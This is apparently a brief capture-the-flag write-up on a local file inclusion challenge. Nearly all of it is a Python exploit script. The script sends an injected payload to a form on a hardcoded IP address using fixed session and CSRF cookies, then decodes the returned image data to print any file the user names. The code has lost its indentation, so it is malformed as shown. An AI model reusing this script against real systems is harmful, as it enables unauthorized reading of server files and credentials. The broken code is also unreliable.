Tags: lfi
Rating: 1.0
Exploit LFI to arbitary file read.
```python
import requests
from bs4 import BeautifulSoup
from base64 import b64decode
import random
import string
headers = {
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
'Accept-Language': 'en-GB,en;q=0.5',
'Referer': 'http://193.57.159.27:26683/new/',
'Content-Type': 'application/x-www-form-urlencoded',
'Origin': 'http://193.57.159.27:26683',
'Connection': 'keep-alive',
'Upgrade-Insecure-Requests': '1',
'Pragma': 'no-cache',
'Cache-Control': 'no-cache',
}
cookie = {
"csrftoken":"WpkSPU3EitDvJgR6O8SOeaNACQLMLmNPDecOYKdrpUnG5yQFa45lHEDpqFFoEvHN",
"sessionid": ".eJxNjEsKwjAURQVxKIKr0EnoS9qXZCbOXUN5aRLbKg30MxRcQIZxIe5QRYXe4TmHe189novvbmkX1yVNY11Og-vLxqa4BMAUtzNqqLq47q32tqXuHFgVurFvDPsk7GcHdgrWXY__djM7qGmoUzwgFCAxz4i85iI3ymSCo3fca22l8KC1stIgeo-ggVdYAHGnpORCgcnTxF4l3D6b:1mFhwu:mlibTmM3JvM87A1WTadKyJVBiuYRJJUgj6h-HKyYfRM"
}
def send_request(payload):
data = {
"csrfmiddlewaretoken":"J0krStVNFuVQo6cpg2JpH5RFWeD69XBwqPcn1j5AMVF1KobYCYWWazHuK3xI26vu",
"name":"test15",
"body":"({}}{%s}..})" % payload
}
response = requests.post("http://193.57.159.27:45262/new/", headers=headers, data=data, cookies=cookie)
soup = BeautifulSoup(response.text, "html.parser")
paragraph = soup.find('p', class_='card-text')
base64_data = paragraph.img['src'].replace("data:image/png;base64,", "")
print(b64decode(base64_data).decode("UTF-8"))
if __name__ == "__main__":
payload = input("File to read: ").strip()
send_request(payload)
```
